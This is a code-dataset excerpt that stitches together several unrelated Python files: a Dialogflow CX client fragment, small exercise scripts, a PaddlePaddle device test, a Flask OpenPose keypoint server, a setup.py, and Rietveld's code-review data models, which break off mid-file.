google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup:
An TransitionRouteGroup represents a group of
[TransitionRoutes][google.cloud.dialogflow.cx.v3beta1.TransitionRoute]
to be used by a
[Page][google.cloud.dialogflow.cx.v3beta1.Page].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, transition_route_group])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a gcdc_transition_route_group.CreateTransitionRouteGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, gcdc_transition_route_group.CreateTransitionRouteGroupRequest
):
request = gcdc_transition_route_group.CreateTransitionRouteGroupRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if transition_route_group is not None:
request.transition_route_group = transition_route_group
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_transition_route_group
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def update_transition_route_group(
self,
request: gcdc_transition_route_group.UpdateTransitionRouteGroupRequest = None,
*,
transition_route_group: gcdc_transition_route_group.TransitionRouteGroup = None,
update_mask: field_mask.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> gcdc_transition_route_group.TransitionRouteGroup:
r"""Updates the specified
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
Args:
request (google.cloud.dialogflowcx_v3beta1.types.UpdateTransitionRouteGroupRequest):
The request object. The request message for
[TransitionRouteGroups.UpdateTransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.UpdateTransitionRouteGroup].
transition_route_group (google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup):
Required. The transition route group
to update.
This corresponds to the ``transition_route_group`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
The mask to control which fields get
updated.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup:
An TransitionRouteGroup represents a group of
[TransitionRoutes][google.cloud.dialogflow.cx.v3beta1.TransitionRoute]
to be used by a
[Page][google.cloud.dialogflow.cx.v3beta1.Page].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([transition_route_group, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a gcdc_transition_route_group.UpdateTransitionRouteGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, gcdc_transition_route_group.UpdateTransitionRouteGroupRequest
):
request = gcdc_transition_route_group.UpdateTransitionRouteGroupRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if transition_route_group is not None:
request.transition_route_group = transition_route_group
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_transition_route_group
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("transition_route_group.name", request.transition_route_group.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def delete_transition_route_group(
self,
request: transition_route_group.DeleteTransitionRouteGroupRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes the specified
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
Args:
request (google.cloud.dialogflowcx_v3beta1.types.DeleteTransitionRouteGroupRequest):
The request object. The request message for
[TransitionRouteGroups.DeleteTransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.DeleteTransitionRouteGroup].
name (str):
Required. The name of the
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup]
to delete. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>/transitionRouteGroups/<Transition Route Group ID>``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a transition_route_group.DeleteTransitionRouteGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, transition_route_group.DeleteTransitionRouteGroupRequest
):
request = transition_route_group.DeleteTransitionRouteGroupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_transition_route_group
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-dialogflowcx",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("TransitionRouteGroupsClient",)
| [
"[email protected]"
] | |
48fdd9fa5aba23d7bfbf4bd119d4bcc4a83a85a2 | 35d62f3ccf1c422b13b313c4e519a5ce335e934d | /leetcode/jewelsAndStones.py | cc1e31157da05da0b2095b9c498ceeb4b90ee203 | [] | no_license | malaybiswal/python | 357a074889299effe6a5fa2f1cd9c50ca35652d0 | 684d24d719b785725e736671faf2681232ecc394 | refs/heads/master | 2020-05-17T22:25:43.043929 | 2019-05-08T23:41:19 | 2019-05-08T23:41:19 | 183,999,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | #https://leetcode.com/problems/jewels-and-stones/
def numJewelsInStones(J, S):
c=0
for x in J:
for y in S:
if(x==y):
c+=1
return c
x="zz"
y="ZZZ"
print(numJewelsInStones(x,y)) | [
"[email protected]"
] | |
516e7adfdc21f38790c5bfe5706d14864c96eaab | 3cd8bdcda9d0e549df184a5d9085ed8f5a86145d | /defining_classes/to_do_list/project/task.py | ad5910ea22a5b8855a43873b237cf5c1d554e494 | [] | no_license | ivklisurova/SoftUni_Python_OOP | bbec8a5d0d8c2c3f536dd2a92e9187aa39121692 | 59e2080b4eb0826a62a020ea3368a0bac6f644be | refs/heads/master | 2022-11-29T00:09:40.488544 | 2020-08-05T19:55:27 | 2020-08-05T19:55:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | class Task:
def __init__(self, name, due_date):
self.name = name
self.due_date = due_date
self.comments = []
self.completed = False
def change_name(self, new_name: str):
if new_name == self.name:
return 'Name cannot be the same.'
self.name = new_name
return self.name
def change_due_date(self, new_date: str):
if new_date == self.due_date:
return 'Date cannot be the same.'
self.due_date = new_date
return self.due_date
def add_comment(self, comment: str):
self.comments.append(comment)
def edit_comment(self, comment_number: int, new_comment: str):
if comment_number >= len(self.comments):
return 'Cannot find comment.'
self.comments[comment_number] = new_comment
return f'{", ".join(self.comments)}'
def details(self):
return f'Name: {self.name} - Due Date: {self.due_date}'
| [
"[email protected]"
] | |
e7b3c28e67c42c208b0778ca9b4afdfddfd18a79 | 706518f154812af56f8fc91a71cd65d9667d9ed0 | /python/paddle/fluid/tests/unittests/test_device.py | 08697a080445e606f17bdde83384eef391713721 | [
"Apache-2.0"
] | permissive | andreazanetti/Paddle | 3ea464703d67963134ffc6828f364412adb03fce | a259076dd01801e2e619237da02235a4856a96bb | refs/heads/develop | 2023-04-25T08:30:43.751734 | 2021-05-05T01:31:44 | 2021-05-05T01:31:44 | 263,870,069 | 0 | 2 | Apache-2.0 | 2020-07-07T10:45:08 | 2020-05-14T09:22:07 | null | UTF-8 | Python | false | false | 3,379 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle
import paddle.fluid as fluid
import paddle.fluid.core as core
import paddle.fluid.framework as framework
class TestStaticDeviceManage(unittest.TestCase):
def _test_device(self, device_name, device_class):
paddle.set_device(device_name)
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
exe = paddle.static.Executor()
exe.run(paddle.fluid.default_startup_program())
res = exe.run(fetch_list=[out3])
device = paddle.get_device()
self.assertEqual(isinstance(exe.place, device_class), True)
self.assertEqual(device, device_name)
def test_cpu_device(self):
self._test_device("cpu", core.CPUPlace)
def test_gpu_device(self):
if core.is_compiled_with_cuda():
self._test_device("gpu:0", core.CUDAPlace)
def test_xpu_device(self):
if core.is_compiled_with_xpu():
self._test_device("xpu:0", core.XPUPlace)
class TestImperativeDeviceManage(unittest.TestCase):
def test_cpu(self):
with fluid.dygraph.guard():
paddle.set_device('cpu')
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(), core.CPUPlace),
True)
self.assertEqual(device, "cpu")
def test_gpu(self):
if core.is_compiled_with_cuda():
with fluid.dygraph.guard():
paddle.set_device('gpu:0')
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(),
core.CUDAPlace), True)
self.assertEqual(device, "gpu:0")
def test_xpu(self):
if core.is_compiled_with_xpu():
with fluid.dygraph.guard():
out = paddle.to_tensor([1, 2])
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(),
core.XPUPlace), True)
self.assertTrue(out.place.is_xpu_place())
self.assertEqual(device, "xpu:0")
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
67056ff3f3511beb22ed46e346b3d52b30d40eed | cc1cd104b4b383e7807e75e2fb0a8e84e5fcf7df | /api_server/openpose_wrapper/openpose_server/app.py | 491381120447d9b6e7f8461f4eb89313c620e8c9 | [] | no_license | Sam1224/OutfitApp-AWS | b9884d40945d2076f2135c0d2d75cf938161af9f | 6c1b4d1e5c328c5d22b8f055d41a57ec2e9b921e | refs/heads/master | 2022-04-24T11:50:24.506423 | 2020-04-29T11:03:43 | 2020-04-29T11:03:43 | 257,340,558 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,164 | py | # coding=utf-8
import os
import sys
import argparse
import json
from PIL import Image
import cv2
import numpy as np
import itertools
# flask
import flask
#from flask import Flask, render_template, request, jsonify
# openpose python API
sys.path.append('../openpose_gpu/build/python');
from openpose import pyopenpose as op
# 自作モジュール
from utils import conv_base64_to_pillow, conv_base64_to_cv, conv_pillow_to_base64
#======================
# グローバル変数
#======================
app = flask.Flask(__name__)
app.config['JSON_AS_ASCII'] = False # 日本語文字化け対策
app.config["JSON_SORT_KEYS"] = False # ソートをそのまま
OPENPOSE_MODE_DIR_PATH = "../openpose_gpu/models/"
#================================================================
# "http://host_ip:5010" リクエスト送信時の処理
#================================================================
@app.route('/')
def index():
print( "リクエスト受け取り" )
return
#================================================================
# "http://host_ip:5010/openpose" にリクエスト送信時の処理
#================================================================
@app.route('/openpose', methods=['POST'])
def responce():
print( "リクエスト受け取り" )
if( app.debug ):
print( "flask.request.method : ", flask.request.method )
print( "flask.request.headers \n: ", flask.request.headers )
#------------------------------------------
# 送信された json データの取得
#------------------------------------------
if( flask.request.headers["User-Agent"].split("/")[0] in "python-requests" ):
json_data = json.loads(flask.request.json)
else:
json_data = flask.request.get_json()
#------------------------------------------
# 送信された画像データの変換
#------------------------------------------
pose_img_cv = conv_base64_to_cv( json_data["pose_img_base64"] )
if( app.debug ):
cv2.imwrite( "tmp/pose_img.png", pose_img_cv )
#------------------------------------------
# OpenPose Python-API の実行
# 参考 : openpose_gpu/build/examples/tutorial_api_python/01_body_from_image.py
#------------------------------------------
# パラメーターの設定
params = dict()
params["model_folder"] = OPENPOSE_MODE_DIR_PATH
params["face"] = True
params["hand"] = True
# OpenPose Python-API
opWrapper = op.WrapperPython()
opWrapper.configure(params)
opWrapper.start()
# Process Image
datum = op.Datum()
datum.cvInputData = pose_img_cv
opWrapper.emplaceAndPop([datum])
# keypoints の取得
pose_keypoints_2d = np.delete( datum.poseKeypoints, [8, 19, 20, 21, 22, 23, 24], axis=1).reshape(-1).tolist()
face_keypoints_2d = datum.faceKeypoints.reshape(-1).tolist()
pose_keypoints_3d = datum.poseKeypoints3D.tolist()
face_keypoints_3d = datum.faceKeypoints3D.tolist()
left_hand_keypoints_2d = datum.handKeypoints[0].reshape(-1).tolist()
right_hand_keypoints_2d = datum.handKeypoints[1].reshape(-1).tolist()
hand_left_keypoints_3d = datum.handKeypoints3D[0].tolist()
hand_right_keypoints_3d = datum.handKeypoints3D[1].tolist()
"""
if( args.debug ):
print("pose_keypoints_2d : ", pose_keypoints_2d )
#print("pose_keypoints_2d[0][0] : ", pose_keypoints_2d[0][0] )
#print("face_keypoints_2d: ", face_keypoints_2d )
#print("pose_keypoints_3d: ", pose_keypoints_3d )
#print("datum.cvOutputData: ", datum.cvOutputData )
"""
#------------------------------------------
# レスポンスメッセージの設定
#------------------------------------------
http_status_code = 200
response = flask.jsonify(
{
"version" : 1.3,
"people" : [
{
"pose_keypoints_2d" : pose_keypoints_2d,
"face_keypoints_2d" : face_keypoints_2d,
"hand_left_keypoints_2d" : left_hand_keypoints_2d,
"hand_right_keypoints_2d" : right_hand_keypoints_2d,
"pose_keypoints_3d" : pose_keypoints_3d,
"face_keypoints_3d" : face_keypoints_3d,
"hand_left_keypoints_3d" : hand_left_keypoints_3d,
"hand_right_keypoints_3d" : hand_right_keypoints_3d,
}
]
}
)
# レスポンスメッセージにヘッダーを付与(Access-Control-Allow-Origin エラー対策)
#response.headers.add('Access-Control-Allow-Origin', '*')
#response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
#response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')
if( app.debug ):
print( "response.headers : \n", response.headers )
return response, http_status_code
if __name__ == "__main__":
parser = argparse.ArgumentParser()
#parser.add_argument('--host', type=str, default="localhost", help="ホスト名(コンテナ名 or コンテナ ID)")
#parser.add_argument('--host', type=str, default="openpose_ubuntu_gpu_container", help="ホスト名(コンテナ名 or コンテナ ID)")
parser.add_argument('--host', type=str, default="0.0.0.0", help="ホスト名(コンテナ名 or コンテナ ID)")
parser.add_argument('--port', type=str, default="5010", help="ポート番号")
parser.add_argument('--enable_threaded', action='store_true', help="並列処理有効化")
parser.add_argument('--debug', action='store_true', help="デバッグモード有効化")
args = parser.parse_args()
if( args.debug ):
for key, value in vars(args).items():
print('%s: %s' % (str(key), str(value)))
if not os.path.exists("tmp"):
os.mkdir("tmp")
if( args.debug ):
app.debug = True
else:
app.debug = False
if( args.enable_threaded ):
app.run( host=args.host, port=args.port, threaded=False )
else:
app.run( host=args.host, port=args.port, threaded=True )
| [
"[email protected]"
] | |
920d2263cbeb1e5be4d7cfac31f5ccec2fafdc5a | 1f0831db24ae2772d4944faf05289599bb37aca7 | /data_crawling/08/api/setup.py | 4d6fe9c915145a8327f8ea7ba8e946c9660fc6d8 | [] | no_license | smaystr/rails_reactor | 2123f39ae97f38acb647363979fe4a09b896670e | 69c8aac5860527768b4a8b7bce027b9dea6b1989 | refs/heads/master | 2022-08-19T05:35:21.535933 | 2019-08-28T12:46:22 | 2019-08-28T12:46:22 | 189,264,026 | 1 | 0 | null | 2022-07-29T22:34:56 | 2019-05-29T16:47:08 | Jupyter Notebook | UTF-8 | Python | false | false | 660 | py | from setuptools import setup
with open('requirements.txt') as f:
requirements = f.read().splitlines()
setup(
name="sergey_milantiev_crawler_master",
version="0.0.0",
install_requires=requirements,
packages=["app"],
author="[email protected]",
url="",
download_url="",
description="CRAWLER DOMRIA API",
long_description="",
license="MIT",
keywords="",
classifiers=[
"Intended Audience :: Developers",
"Programming Language :: Python",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.7",
],
)
| [
"[email protected]"
] | |
9235b80e5ef760386db087cbeb1eedcff79edbd7 | def1b645cf84f25f746926771b7798215b505514 | /codereview/models.py | 446f6066db2bf1f7ab0a358eae2b61a87b4fc8ae | [
"Apache-2.0"
] | permissive | ojengwa/codereview | 07770b3dbe9e882749ff013a7dba9241e99b0ad5 | 23e3e6654fc09084724ddaa33d982df98e5e5a7b | refs/heads/master | 2021-01-17T07:27:46.977826 | 2015-10-13T14:46:26 | 2015-10-13T14:46:26 | 51,166,443 | 1 | 0 | null | 2016-02-05T18:40:31 | 2016-02-05T18:40:31 | null | UTF-8 | Python | false | false | 29,543 | py | # Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""App Engine data model (schema) definition for Rietveld."""
import logging
from hashlib import md5
import os
import re
import time
from google.appengine.ext import db
from google.appengine.api import memcache
from google.appengine.api import users
from django.utils.encoding import force_unicode
import engine
import patching
CONTEXT_CHOICES = (3, 10, 25, 50, 75, 100)
# GQL query cache ###
_query_cache = {}
def gql(cls, clause, *args, **kwds):
"""Return a query object, from the cache if possible.
Args:
cls: a db.Model subclass.
clause: a query clause, e.g. 'WHERE draft = TRUE'.
*args, **kwds: positional and keyword arguments to be bound to the query.
Returns:
A db.GqlQuery instance corresponding to the query with *args and
**kwds bound to the query.
"""
query_string = 'SELECT * FROM %s %s' % (cls.kind(), clause)
query = _query_cache.get(query_string)
if query is None:
_query_cache[query_string] = query = db.GqlQuery(query_string)
query.bind(*args, **kwds)
return query
# Issues, PatchSets, Patches, Contents, Comments, Messages ###
class Issue(db.Model):
"""The major top-level entity.
It has one or more PatchSets as its descendants.
"""
subject = db.StringProperty(required=True)
description = db.TextProperty()
#: in Subversion - repository path (URL) for files in patch set
base = db.StringProperty()
#: if True then base files for patches were uploaded with upload.py
#: (if False - then Rietveld attempts to download them from server)
local_base = db.BooleanProperty(default=False)
repo_guid = db.StringProperty()
owner = db.UserProperty(auto_current_user_add=True, required=True)
created = db.DateTimeProperty(auto_now_add=True)
modified = db.DateTimeProperty(auto_now=True)
reviewers = db.ListProperty(db.Email)
cc = db.ListProperty(db.Email)
closed = db.BooleanProperty(default=False)
private = db.BooleanProperty(default=False)
n_comments = db.IntegerProperty()
latest_patch_rev = db.StringProperty(required=False)
latest_reviewed_rev = db.StringProperty(required=False)
processing = db.BooleanProperty(default=False)
_is_starred = None
class Meta:
permissions = (
("view_issue", "View issue"),
)
@property
def is_starred(self):
"""Whether the current user has this issue starred."""
if self._is_starred is not None:
return self._is_starred
account = Account.current_user_account
self._is_starred = account is not None and self.key(
).id() in account.stars
return self._is_starred
def user_can_edit(self, user):
"""Return true if the given user has permission to edit this issue."""
return user == self.owner or user.has_perm('codereview.change_issue')
@property
def edit_allowed(self):
"""Whether the current user can edit this issue."""
account = Account.current_user_account
if account is None:
return False
return self.user_can_edit(account.user)
def update_comment_count(self, n):
"""Increment the n_comments property by n.
If n_comments in None, compute the count through a query. (This
is a transitional strategy while the database contains Issues
created using a previous version of the schema.)
"""
if self.n_comments is None:
self.n_comments = self._get_num_comments()
self.n_comments += n
@property
def num_comments(self):
"""The number of non-draft comments for this issue.
This is almost an alias for self.n_comments, except that if
n_comments is None, it is computed through a query, and stored,
using n_comments as a cache.
"""
if self.n_comments is None:
self.n_comments = self._get_num_comments()
return self.n_comments
def _get_num_comments(self):
"""Helper to compute the number of comments through a query."""
return gql(Comment,
'WHERE ANCESTOR IS :1 AND draft = FALSE',
self).count()
_num_drafts = None
@property
def num_drafts(self):
"""The number of draft comments on this issue for the current user.
The value is expensive to compute, so it is cached.
"""
if self._num_drafts is None:
account = Account.current_user_account
if account is None:
self._num_drafts = 0
else:
query = gql(Comment,
'WHERE ANCESTOR IS :1 AND author = :2 AND draft = TRUE',
self, account.user)
self._num_drafts = query.count()
return self._num_drafts
@property
def patchsets(self):
"""Get issue patchsets in order."""
return self.patchset_set.order('created')
@property
def latest_patchset(self):
"""Get latest patchset."""
try:
return self.patchsets.reverse()[0]
except IndexError:
return None
@property
def latest_patchset_number(self):
"""Get latest patchset number."""
try:
return list(self.patchsets).index(self.latest_patchset) + 1
except ValueError:
return None
@property
def latest_approved_patchset(self):
"""Get latest approved patchset."""
if self.latest_reviewed_rev:
try:
return self.patchsets.reverse().filter(revision=self.latest_reviewed_rev)[0]
except IndexError:
return None
@property
def latest_approved_patchset_number(self):
"""Get latest approved patchset number."""
try:
return list(self.patchsets).index(self.latest_approved_patchset) + 1
except ValueError:
return None
class PatchSet(db.Model):
"""A set of patchset uploaded together.
This is a descendant of an Issue and has Patches as descendants.
"""
issue = db.ReferenceProperty(Issue) # == parent
message = db.StringProperty()
data = db.TextProperty() # blob
url = db.LinkProperty()
created = db.DateTimeProperty(auto_now_add=True)
modified = db.DateTimeProperty(auto_now=True)
n_comments = db.IntegerProperty(default=0)
revision = db.StringProperty(required=False)
class Meta:
permissions = (
("approve_patchset", "Approve patchset"),
)
def update_comment_count(self, n):
"""Increment the n_comments property by n."""
self.n_comments = self.num_comments + n
@property
def num_comments(self):
"""The number of non-draft comments for this issue.
This is almost an alias for self.n_comments, except that if
n_comments is None, 0 is returned.
"""
# For older patchsets n_comments is None.
return self.n_comments or 0
class Message(db.Model):
"""A copy of a message sent out in email.
This is a descendant of an Issue.
"""
issue = db.ReferenceProperty(Issue) # == parent
subject = db.StringProperty()
sender = db.EmailProperty()
recipients = db.ListProperty(db.Email)
date = db.DateTimeProperty(auto_now_add=True)
text = db.TextProperty()
draft = db.BooleanProperty(default=False)
_approval = None
@property
def approval(self):
"""Is True when the message represents an approval of the review."""
if self._approval is None:
# Must contain 'lgtm' in a line that doesn't start with '>'.
self._approval = any(
True for line in self.text.lower().splitlines()
if not line.strip().startswith('>') and 'lgtm' in line)
# Must not be issue owner.
self._approval &= self.issue.owner.email() != self.sender
return self._approval
class Content(db.Model):
"""The content of a text file.
This is a descendant of a Patch.
"""
# parent => Patch
text = db.TextProperty()
data = db.TextProperty() # blob
# Checksum over text or data depending on the type of this content.
checksum = db.TextProperty()
is_uploaded = db.BooleanProperty(default=False)
is_bad = db.BooleanProperty(default=False)
file_too_large = db.BooleanProperty(default=False)
@property
def lines(self):
"""The text split into lines, retaining line endings."""
if not self.text:
return []
return self.text.splitlines(True)
class Patch(db.Model):
"""A single patch, i.e. a set of changes to a single file.
This is a descendant of a PatchSet.
"""
patchset = db.ReferenceProperty(PatchSet) # == parent
filename = db.StringProperty()
old_filename = db.StringProperty()
status = db.StringProperty() # 'A', 'A +', 'M', 'D' etc
text = db.TextProperty()
content = db.ReferenceProperty(Content)
patched_content = db.ReferenceProperty(
Content, collection_name='patch2_set')
is_binary = db.BooleanProperty(default=False)
# Ids of patchsets that have a different version of this file.
delta = db.ListProperty(int)
delta_calculated = db.BooleanProperty(default=False)
_lines = None
@property
def lines(self):
"""The patch split into lines, retaining line endings.
The value is cached.
"""
if self._lines is not None:
return self._lines
if not self.text:
lines = []
else:
lines = self.text.splitlines(True)
self._lines = lines
return lines
_property_changes = None
@property
def property_changes(self):
"""The property changes split into lines.
The value is cached.
"""
if self._property_changes is not None:
return self._property_changes
self._property_changes = []
match = re.search(
'^Property changes on.*\n' + '_' * 67 + '$', self.text,
re.MULTILINE)
if match:
self._property_changes = self.text[match.end():].splitlines()
return self._property_changes
_num_added = None
@property
def num_added(self):
"""The number of line additions in this patch.
The value is cached.
"""
if self._num_added is None:
self._num_added = self.count_startswith('+') - 1
return self._num_added
_num_removed = None
@property
def num_removed(self):
"""The number of line removals in this patch.
The value is cached.
"""
if self._num_removed is None:
self._num_removed = self.count_startswith('-') - 1
return self._num_removed
_num_chunks = None
@property
def num_chunks(self):
"""The number of 'chunks' in this patch.
A chunk is a block of lines starting with '@@'.
The value is cached.
"""
if self._num_chunks is None:
self._num_chunks = self.count_startswith('@@')
return self._num_chunks
_num_comments = None
@property
def num_comments(self):
"""The number of non-draft comments for this patch.
The value is cached.
"""
if self._num_comments is None:
self._num_comments = gql(Comment,
'WHERE patch = :1 AND draft = FALSE',
self).count()
return self._num_comments
_num_drafts = None
@property
def num_drafts(self):
"""The number of draft comments on this patch for the current user.
The value is expensive to compute, so it is cached.
"""
if self._num_drafts is None:
account = Account.current_user_account
if account is None:
self._num_drafts = 0
else:
query = gql(Comment,
'WHERE patch = :1 AND draft = TRUE AND author = :2',
self, account.user)
self._num_drafts = query.count()
return self._num_drafts
def count_startswith(self, prefix):
"""Returns the number of lines with the specified prefix."""
return len([l for l in self.lines if l.startswith(prefix)])
def get_content(self):
"""Get self.content, or fetch it if necessary.
This is the content of the file to which this patch is relative.
Returns:
a Content instance.
Raises:
engine.FetchError: If there was a problem fetching it.
"""
try:
if self.content is not None:
if self.content.is_bad:
msg = 'Bad content. Try to upload again.'
logging.warn('Patch.get_content: %s', msg)
raise engine.FetchError(msg)
if self.content.is_uploaded and self.content.text is None:
msg = 'Upload in progress.'
logging.warn('Patch.get_content: %s', msg)
raise engine.FetchError(msg)
else:
return self.content
except db.Error:
# This may happen when a Content entity was deleted behind our
# back.
self.content = None
content = engine.FetchBase(self.patchset.issue.base, self)
content.put()
self.content = content
self.put()
return content
def get_patched_content(self):
"""Get self.patched_content, computing it if necessary.
This is the content of the file after applying this patch.
Returns:
a Content instance.
Raises:
engine.FetchError: If there was a problem fetching the old content.
"""
try:
if self.patched_content is not None:
return self.patched_content
except db.Error:
# This may happen when a Content entity was deleted behind our
# back.
self.patched_content = None
old_lines = self.get_content().text.splitlines(True)
logging.info('Creating patched_content for %s', self.filename)
chunks = patching.ParsePatchToChunks(self.lines, self.filename)
new_lines = []
for _, _, new in patching.PatchChunks(old_lines, chunks):
new_lines.extend(new)
text = db.Text(''.join(new_lines))
patched_content = Content(text=text, parent=self)
patched_content.put()
self.patched_content = patched_content
self.put()
return patched_content
@property
def no_base_file(self):
"""Returns True iff the base file is not available."""
return self.content and self.content.file_too_large
class Comment(db.Model):
"""A Comment for a specific line of a specific file.
This is a descendant of a Patch.
"""
patch = db.ReferenceProperty(Patch) # == parent
message_id = db.StringProperty() # == key_name
author = db.UserProperty(auto_current_user_add=True)
date = db.DateTimeProperty(auto_now=True)
lineno = db.IntegerProperty()
text = db.TextProperty()
left = db.BooleanProperty()
draft = db.BooleanProperty(required=True, default=True)
buckets = None
shorttext = None
def complete(self):
"""Set the shorttext and buckets attributes."""
# TODO(guido): Turn these into caching proprties instead.
# The strategy for buckets is that we want groups of lines that
# start with > to be quoted (and not displayed by
# default). Whitespace-only lines are not considered either quoted
# or not quoted. Same goes for lines that go like "On ... user
# wrote:".
cur_bucket = []
quoted = None
self.buckets = []
def _Append():
if cur_bucket:
self.buckets.append(Bucket(text="\n".join(cur_bucket),
quoted=bool(quoted)))
lines = self.text.splitlines()
for line in lines:
if line.startswith("On ") and line.endswith(":"):
pass
elif line.startswith(">"):
if quoted is False:
_Append()
cur_bucket = []
quoted = True
elif line.strip():
if quoted is True:
_Append()
cur_bucket = []
quoted = False
cur_bucket.append(line)
_Append()
self.shorttext = self.text.lstrip()[:50].rstrip()
# Grab the first 50 chars from the first non-quoted bucket
for bucket in self.buckets:
if not bucket.quoted:
self.shorttext = bucket.text.lstrip()[:50].rstrip()
break
class Bucket(db.Model):
"""A 'Bucket' of text.
A comment may consist of multiple text buckets, some of which may be
collapsed by default (when they represent quoted text).
NOTE: This entity is never written to the database. See Comment.complete().
"""
# TODO(guido): Flesh this out.
text = db.TextProperty()
quoted = db.BooleanProperty()
# Repositories and Branches ###
class Repository(db.Model):
